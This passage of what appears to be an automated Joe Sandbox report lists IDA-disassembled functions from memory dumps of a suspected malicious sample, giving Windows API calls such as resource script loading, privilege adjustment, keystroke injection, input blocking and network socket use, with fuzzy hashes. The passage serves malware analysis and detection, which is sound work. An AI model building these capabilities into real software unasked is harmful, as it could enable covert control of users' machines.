(, xrefs: 00DC240A

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Color$Proc
String ID: (
API String ID: 929743424-2063206799
Opcode ID: 175d4ec37fb7bdf1db9cd6b40f785b548da315e7a3eb5c0eca9343fdd9dd9f00
Instruction ID: 043d145edcc97d7f20555bf30af8419931331e812d1711eb90699b1e181acc25
Opcode Fuzzy Hash: 175d4ec37fb7bdf1db9cd6b40f785b548da315e7a3eb5c0eca9343fdd9dd9f00
Instruction Fuzzy Hash: 9A814BB0118491BEE63D663D8C98FBF199EDB42305F18050EF542F79D6C96ACF829236

Function 00E33A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E056C2,?,?,00000000,00000000), ref: 00E33A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E056C2,?,?,00000000,00000000), ref: 00E33A35
LoadResource.KERNEL32(?,00000000,?,?,00E056C2,?,?,00000000,00000000,?,?,?,?,?,?,00DC66CE), ref: 00E33A45
SizeofResource.KERNEL32(?,00000000,?,?,00E056C2,?,?,00000000,00000000,?,?,?,?,?,?,00DC66CE), ref: 00E33A56
LockResource.KERNEL32(00E056C2,?,?,00E056C2,?,?,00000000,00000000,?,?,?,?,?,?,00DC66CE,?), ref: 00E33A65

Strings

SCRIPT, xrefs: 00E33A2B

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: ca2dc38906fcaa272ecc16d3b1e60f219349c78a71effed715ed62aefe989543
Instruction ID: 1f2b6d41e880314a1432a871638e2d691c8cfae2b42a76b34a38193ec08184b7
Opcode Fuzzy Hash: ca2dc38906fcaa272ecc16d3b1e60f219349c78a71effed715ed62aefe989543
Instruction Fuzzy Hash: 73119771200301AFE7288B26DC48F277FB9EBC4B05F20466CB456EA6A0DB71E800CA20

Function 00E220AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E21900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E21916
Part of subcall function 00E21900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E21922
Part of subcall function 00E21900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E21931
Part of subcall function 00E21900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E21938
Part of subcall function 00E21900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E2194E

GetLengthSid.ADVAPI32(?,00000000,00E21C81), ref: 00E220FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E22107
HeapAlloc.KERNEL32(00000000), ref: 00E2210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 00E22127
GetProcessHeap.KERNEL32(00000000,00000000,00E21C81), ref: 00E2213B
HeapFree.KERNEL32(00000000), ref: 00E22142

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 7bf3b25db7af6f6c9765fe19d911d64db12604e4437181de53a339bdca8f3535
Instruction ID: 954843f704e80a35c79f905bd2a54db776432eb556caf8eba0aa208bd5ad73e9
Opcode Fuzzy Hash: 7bf3b25db7af6f6c9765fe19d911d64db12604e4437181de53a339bdca8f3535
Instruction Fuzzy Hash: AF11AC71502614FFDB249F65EC09FAE7BA9EF8436AF14841CEA41B7160C735A944CB60

Function 00E3A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00E3A5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00E3A6D0

Part of subcall function 00E342B9: GetInputState.USER32 ref: 00E34310
Part of subcall function 00E342B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E343AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00E3A5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00E3A6BA

Strings

*.*, xrefs: 00E3A5A2

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 2e80fa6a7f930a26a17b84e1c049dce1758f4058da50e126b48bc361d682d72e
Instruction ID: 789573b6245ba5cc7f7eab81b9fe1a97c7dd16fb4c50018959ca3bbd8cf70363
Opcode Fuzzy Hash: 2e80fa6a7f930a26a17b84e1c049dce1758f4058da50e126b48bc361d682d72e
Instruction Fuzzy Hash: 7441307190420AAFCB14DF65C84AAEE7BB5EF05314F185469E445B21A1EB31DE84CF61

Function 00E42263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E43AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E43AD7
Part of subcall function 00E43AAB: _wcslen.LIBCMT ref: 00E43AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E422BA
WSAGetLastError.WSOCK32 ref: 00E422E1
bind.WSOCK32(00000000,?,00000010), ref: 00E42338
WSAGetLastError.WSOCK32 ref: 00E42343
closesocket.WSOCK32(00000000), ref: 00E42372

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: ab027a6910eca2b1d35eef5d3c9595e0af56344c08dfaeb18cd826ac1a370df7
Instruction ID: bfd4f081053ddb0f81e6116f2e3286504d0fe17d809baecd3a9c6e251bdf289a
Opcode Fuzzy Hash: ab027a6910eca2b1d35eef5d3c9595e0af56344c08dfaeb18cd826ac1a370df7
Instruction Fuzzy Hash: 2051D175A00201AFE720AF64C886F2A77E5EB44718F54848CF945AF3D3CB71AC418BB1

Function 00E526DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00E5275C
IsWindowEnabled.USER32 ref: 00E5276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00E52777
IsIconic.USER32 ref: 00E52785
IsZoomed.USER32 ref: 00E52793

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 606d8d482b699c980ea98ac0539af3256fff4047c46384f43630d08f32e97b86
Instruction ID: 15c746376a5762147a2b2c3cdb02919f8badbf332f82742bbacfd8b318d62a9e
Opcode Fuzzy Hash: 606d8d482b699c980ea98ac0539af3256fff4047c46384f43630d08f32e97b86
Instruction Fuzzy Hash: 032107317002018FD725DF26C844B5A7BD4EF8A316F18986EED49AB251D771DC4AC7A0

Function 00E3D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00E3D8CE
GetLastError.KERNEL32(?,00000000), ref: 00E3D92F
SetEvent.KERNEL32(?,?,00000000), ref: 00E3D943

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: c492661886fbe167280857fbb959ff1aca5fc2e011d58c38574baff3bf9c399c
Instruction ID: db11eeff31fd88ab7aa448f689a13a5fcf8ee2257a903c5b6a02a7503451ce6b
Opcode Fuzzy Hash: c492661886fbe167280857fbb959ff1aca5fc2e011d58c38574baff3bf9c399c
Instruction Fuzzy Hash: 89219071508705AFE731DF66EC48BAABBFCEB80318F105419E646B2151E7B0EA08CB60

Function 00E2E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00E046AC), ref: 00E2E482
GetFileAttributesW.KERNEL32(?), ref: 00E2E491
FindFirstFileW.KERNEL32(?,?), ref: 00E2E4A2
FindClose.KERNEL32(00000000), ref: 00E2E4AE

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: b6f730e3fa7d78956da9bdfe92aa4a9cfd424b2741d531772f917a088777f293
Instruction ID: d1709caa63de475f5964b641b077b56429948089408d94ff46f6e556c753210f
Opcode Fuzzy Hash: b6f730e3fa7d78956da9bdfe92aa4a9cfd424b2741d531772f917a088777f293
Instruction Fuzzy Hash: 35F0A730814A345B92247738BC0D4AA766DAF0233AB504B06F836E21F0D77499994596

Function 00E1E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00E1E5F8

Strings

%.3d, xrefs: 00E1E603
X64, xrefs: 00E1E680

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: d1c29ec28a60a0ece085b724a434f025ee10109dcda2de5be1856ae1f86691d7
Instruction ID: 4444e2bbdd33af454452748a1d87d3573ff12aeed8844c005a6de3035494a4cc
Opcode Fuzzy Hash: d1c29ec28a60a0ece085b724a434f025ee10109dcda2de5be1856ae1f86691d7
Instruction Fuzzy Hash: 72D012B1C08208DACB9097909D48CF9737CAB28300F905852FD06B1200E620D9C89731

Function 00DF2992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00DF2A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00DF2A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00DF2AA1

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 59a996f26fa0b4b7274bd37849507828fb64eb5b5b9274738ea5c73ba38c2a01
Instruction ID: 8721ed7db0a8c32b0fb4f136d58c6af2178eafbdd51b912ec1d79875c7956f4b
Opcode Fuzzy Hash: 59a996f26fa0b4b7274bd37849507828fb64eb5b5b9274738ea5c73ba38c2a01
Instruction Fuzzy Hash: 5731D57490122C9BCB21DF69DD8879CBBB8AF08310F5082DAE80CA7260E7709F85CF55

Function 00E22010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00DE014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00DE09D8
Part of subcall function 00DE014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00DE09F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E2205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E22087
GetLastError.KERNEL32 ref: 00E22097

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 5d373202a1470d3800cfe6c183dbe66cff9b0618f6b62ad81213a58206598a53
Instruction ID: 630b2ae4ddabc0f8f9de43dd6210092ab913b30157340d5e37cb87fc19f506c2
Opcode Fuzzy Hash: 5d373202a1470d3800cfe6c183dbe66cff9b0618f6b62ad81213a58206598a53
Instruction Fuzzy Hash: F811BFB1404304BFD728AF54EC86D6BBBB8EB04710F20841EE146A7251DBB0BC81CA30

Function 00DE5058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00DE502E,?,00E898D8,0000000C,00DE5185,?,00000002,00000000), ref: 00DE5079
TerminateProcess.KERNEL32(00000000,?,00DE502E,?,00E898D8,0000000C,00DE5185,?,00000002,00000000), ref: 00DE5080
ExitProcess.KERNEL32 ref: 00DE5092

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 3e3695503fd6ee022a9fc88b9df1d8c041430c6d5858fbdd573b75e638a86274
Instruction ID: b21e211b631403e59a1e2b840ab74b6e59f2910cbb82d2b623ddad37b3f60959
Opcode Fuzzy Hash: 3e3695503fd6ee022a9fc88b9df1d8c041430c6d5858fbdd573b75e638a86274
Instruction Fuzzy Hash: 9EE08C31001A88AFCF217F52EE08E583F69EF10386F054414F809AA131DB35DD42CBE0

Function 00E2ECD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00E2ED04

Strings

DOWN, xrefs: 00E2ECE9

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: f1d80dd769676fd2374c271ae3e94180193613e6034b3ee0e5b4d53312213902
Instruction ID: cafe036112f309788a95c8e6f0f086bb48c0143b2e43035d50fc871ffdfa30aa
Opcode Fuzzy Hash: f1d80dd769676fd2374c271ae3e94180193613e6034b3ee0e5b4d53312213902
Instruction Fuzzy Hash: B1E08C266AD77238B90831297C07EF6434C8F22B39B112246F808F41D0ED905C8251B8

Function 00E1E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00E1E664

Strings

X64, xrefs: 00E1E680

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 7bfeb5e32619c116b220cd31bdede54ce41bf60a577c62fb890abff5cba3b995
Instruction ID: 4690f24bae11d1f032c34f51dd8fdc433873ac1bf5ba294ad0837a733f847b2f
Opcode Fuzzy Hash: 7bfeb5e32619c116b220cd31bdede54ce41bf60a577c62fb890abff5cba3b995
Instruction Fuzzy Hash: A1D0C9B480521DEACF90CB50EC88DD9737CBB04304F100A52F546B2140D73095888B20

Function 00E341FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00E452EE,?,?,00000035,?), ref: 00E34229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00E452EE,?,?,00000035,?), ref: 00E34239

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 6a77dd40fc874f0c6b4254a520a5aeca0e7e40f09bd8ae8d560c204028ede320
Instruction ID: 8163bf080fed8e668a675a11334b3f9820c64aeff59de52df66e9fd2ecdb3bfb
Opcode Fuzzy Hash: 6a77dd40fc874f0c6b4254a520a5aeca0e7e40f09bd8ae8d560c204028ede320
Instruction Fuzzy Hash: F1F0E5706043256AEB2016A69C4DFEB3AADEFC5761F000179F505F31D1D9709944C6B1

Function 00E2BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E2BC24
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00E2BC37

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: f4bef612739d498e9afa2f054e1b0a134e042322964eae1f4133e270ae4c0d82
Instruction ID: c974333831f2fd2dce9a8730b752d51465d9bd888d64f4d239484ab7da6b9dac
Opcode Fuzzy Hash: f4bef612739d498e9afa2f054e1b0a134e042322964eae1f4133e270ae4c0d82
Instruction Fuzzy Hash: 0BF0677080424EAFDB059FA1D806BFEBFB0FF08309F00940AF951AA192D3798205DF94

Function 00E21A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E21B48), ref: 00E21A20
CloseHandle.KERNEL32(?,?,00E21B48), ref: 00E21A35

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 8ab5a392651ca473537cdc70bde06119f7e72a5e2a9b6d8d5c25de1bee51a8f8
Instruction ID: 237ac5720dc942965b6c9bb283a5de3528459051400c43482519af890f4ac97c
Opcode Fuzzy Hash: 8ab5a392651ca473537cdc70bde06119f7e72a5e2a9b6d8d5c25de1bee51a8f8
Instruction Fuzzy Hash: C9E0BF72018750AFE7252B11FC05F777BA9EB04311F14895DF595D44B0DBA26CD1DB60

Function 00E3F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00E3F51A

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
